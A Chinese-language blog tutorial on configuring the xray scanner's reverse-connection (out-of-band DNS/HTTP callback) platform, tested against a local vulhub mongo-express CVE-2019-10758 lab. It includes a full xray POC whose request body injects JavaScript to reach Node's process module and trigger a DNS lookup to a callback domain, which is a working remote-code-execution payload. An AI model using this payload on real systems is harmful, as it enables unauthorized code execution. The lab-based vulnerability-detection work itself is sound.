xray反连功能(二)

上一篇:xray反连功能

上一篇讲过了使用ceye的域名进行dns协议漏洞探测,其中存在一个问题:如果我扫描1000个目标,里面有100个存在漏洞,我怎么知道是哪100个url呢

不优雅的解决方案是,用python脚本去ceye的api接口取回探测成功的子域名,然后通过xray的回显去匹配,能够匹配的,就说明那个url存在漏洞

上图是xray生成的json格式的报告,从中根据子域名(xray每一次会生成不同的子域名)匹配ceye中命令执行成功的回显即可。

除此之外,xray还自带一个xray reverse功能

xray自带的反连功能

独立部署Xray反连平台——详细说明加举例xxe漏洞

客户端、服务器配置我们这里就不说了,按照上面的链接配置就好了。

需要vps一个,域名一个

并修改dns的相关配置,A记录、NS记录

1. 靶机搭建

https://github.com/vulhub/vulhub/blob/master/mongo-express/CVE-2019-10758/README.md

cd /pentest/target/vulhub/mongo-express/CVE-2019-10758

docker-compose up -d

存在漏洞的url: http://192.168.18.30:8081/

2. 修改config.yml

  1. 修改db_file_path,我设置的是w.db

  2. 修改token,自定义设置(客户端和服务端设置为一致的token)

  3. 修改enable,设置为true(http、dns都要设置为true)

  4. 修改listen_ip,设置为vps的ip。 是扫描目标反连时所使用的地址,换句话说,当目标存在漏洞时,目标将主动访问 http://vps-ip:vps-port/xxx,xray 会受到这样的“反连”回来的请求,并将漏洞结果展示出来。

    修改listen_port,设置为vps的监听端口

  5. is_domain_name_server,设置为true

  6. dns的domain参数,设置为你的域名

  7. 去你的域名提供商处,设置域名和vps的ip进行绑定(A记录)、设置NS host记录(ns1、ns2)。

  8. dns的resolve参数,设置解析 

    1
    2
    3
    4
    - type: A 
      record: ns1
      value: vps的ip
      ttl: 60

    配置参数可以参考这篇文章:https://blog.csdn.net/qq_38963246/article/details/116712362

3. xray扫描 - http reverse

./xray us -u http://192.168.18.30:8081 –poc xx.yml

4. xray扫描 - dns reverse

./xray ws -u http://192.168.18.30:8081/ –poc /pentest/intelligence-gathering/xray/pocs/mongo-express-cve-2019-10758-dns.yml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
name: poc-yaml-mongo-express-cve-2019-10758-dns
manual: true
transport: http
set:
    reverse: newReverse()
    reverseDomain: reverse.domain
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /checkValid
            headers:
                Authorization: Basic YWRtaW46cGFzcw==
                Content-Type: application/x-www-form-urlencoded
            body: document=this.constructor.constructor('return process')().mainModule.require('dns').resolve('{{reverseDomain}}', (err, value) => {})
            follow_redirects: true
        expression: reverse.wait(5)
expression: r0()
detail:
    author: fnmsd(https://github.com/fnmsd)
    links:
        - https://github.com/masahiro331/CVE-2019-10758
        - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html
    description: Mongo Express CVE-2019-10758 Code Execution
    vulnpath: /checkValid

参考资料